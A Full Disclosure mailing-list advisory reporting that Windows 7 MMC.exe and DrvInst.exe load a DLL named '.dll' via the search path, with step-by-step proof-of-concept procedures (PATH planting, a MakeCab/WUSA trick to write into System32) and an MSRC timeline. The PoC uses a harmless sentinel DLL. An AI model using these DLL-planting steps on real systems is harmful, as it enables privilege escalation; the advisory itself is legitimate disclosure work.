Hi @ll, on Windows 7 (I did not check other versions of Windows, but I'm confident that the underlying bug is present in Windows Vista, Windows Server 2008 [R2], Windows 8[.1] and Windows Server 2012 [R2], i.e. all versions of Windows NT6.x too) the system utilities MMC.exe and DrvInst.exe load and execute a DLL named ".dll", resulting in escalation of privilege.
Since no system DLL by the name ".dll" exists it is loaded via the DLL search path (see <https://msdn.microsoft.com/en-us/library/ms682586.aspx>) Proof of concept for MMC.exe: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 1. download <http://home.arcor.de/skanthak/download/SENTINEL.DLL> (see <http://home.arcor.de/skanthak/sentinel.html> for details) and save it as .DLL ['] in an arbitrary directory of your choice; 2. add this directory to the user's (not the system's) PATH [²]; 3. download the current Realtek PCIexpress ethernet NIC driver from <http://12244.wpc.azureedge.net/8012244/drivers/rtdrivers/cn/nic/0012-Install_Win7_7097_11232015.zip> (via <http://www.realtek.com/downloads/>); 4. open the downloaded 0012-Install_Win7_7097_11232015.zip and extract the contents of the "directory" Install_Win7_7097_11232015\WIN7\32 from the .ZIP to an(other) arbitrary directory of your choice; 5. start device manager (i.e. MMC.exe DevMgmt.msc) [³] and install the Realtek ethernet NIC driver from the directory choosen in step 4; 6. sse the message box displayed from DllMain() of the loaded .DLL ['] Proof of concept for DrvInst.exe: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 1. download <http://home.arcor.de/skanthak/download/SENTINEL.DLL> (see <http://home.arcor.de/skanthak/sentinel.html> for details) and save it as .DLL ['] in an arbitrary directory of your choice; 2a. add this directory to the system's PATH (yes, this requires administrative privileges [³]); OR 2b. run the following 2 commands to "copy" the downloaded .DLL to %SystemRoot%\System32: MakeCab.exe .DLL "%TEMP%\dummy.cab" WUSA.exe "%TEMP%\dummy.cab" /Extract:%SystemRoot%\System32 (yes, this requires administrative privileges [³]); 3. download the Realtek card reader driver from <http://global-download.acer.com/GDFiles/Driver/CardReader/CardReader_Realtek_6.3.9600.21257_W7x64_A.zip> (via <http://support.acer.com/downloads/>) 4. open the downloaded CardReader_Realtek_6.3.9600.21257_W7x64_A.zip and extract the contents of the "directory" CardReader_Realtek_6.3.9600.21257_W7x64\DrvBin32 from the .ZIP to an(other) arbitrary directory of your choice; 5. start device manager (i.e. MMC.exe DevMgmt.msc) [²] and install the Realtek card reader driver from the directory choosen in step 4; 6. start event viewer (i.e. MMC.exe EventVwr.msc) [²] and find the event log entry from source "Vulnerability and Exploit Detector" generated from DllMain() of the loaded .DLL ['] (DrvInst.exe runs in the non-interactive "session 0", so SENTINEL.DLL doesn't display a message box and writes an event log entry only). stay tuned Stefan Kanthak ['] yes, that's a valid Win32 filename; a DLL named ".dll" is loaded via the following (obviously erroneous) calls of Win32 API functions: * LoadLibraryA(""), * LoadLibraryA(L"<arbitrary UNICODE string>"), * LoadLibraryW(L""), * LoadLibraryExA("", ...), * LoadLibraryExA(L"<arbitrary UNICODE string>", ...), * LoadLibraryExW(L"", ...) The most probable cause is feeding of a UNICODE string to the ANSI functions. This bug may be triggered via other execution paths in MMC.exe, via installation of other drivers or via other .MSC too! PS: %SystemRoot%\System32\WBEM\WMIPrvSE.exe and SysInternals VMMap.exe show this bug too! [²] of course the system's PATH may be used instead, or the method shown in step 2b. for the DrvInst.exe exploit. [³] in Windows' default configuration this does NOT trigger the user account control! Timeline: ~~~~~~~~~ 2015-12-04 vulnerability reports sent to MSRC 2015-12-04 response from MSRC regarding DrvInst.exe: "unauthenticated users can't change path" and "for WUSA.exe to work you require the system to be configured by the user in a non-default manner" 2015-12-04 OUCH! sent to MSRC: WUSA.exe <.CAB archive> /Extract:<destination directory> works in DEFAULT configuration of Windows 7, Windows Server 2008 R2, Windows 8[.1] and Windows Server 2012 [R2] 2015-12-04 response from MSRC regarding MMC.exe: "unauthenticated users can't change path" 2015-12-05 OUCH! sent to MSRC: users can change their own PATH, and user's PATH is appended to the system's PATH 2015-12-05 response from MSRC: this does not meet the bar for security servicing. 2015-12-05 report published _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/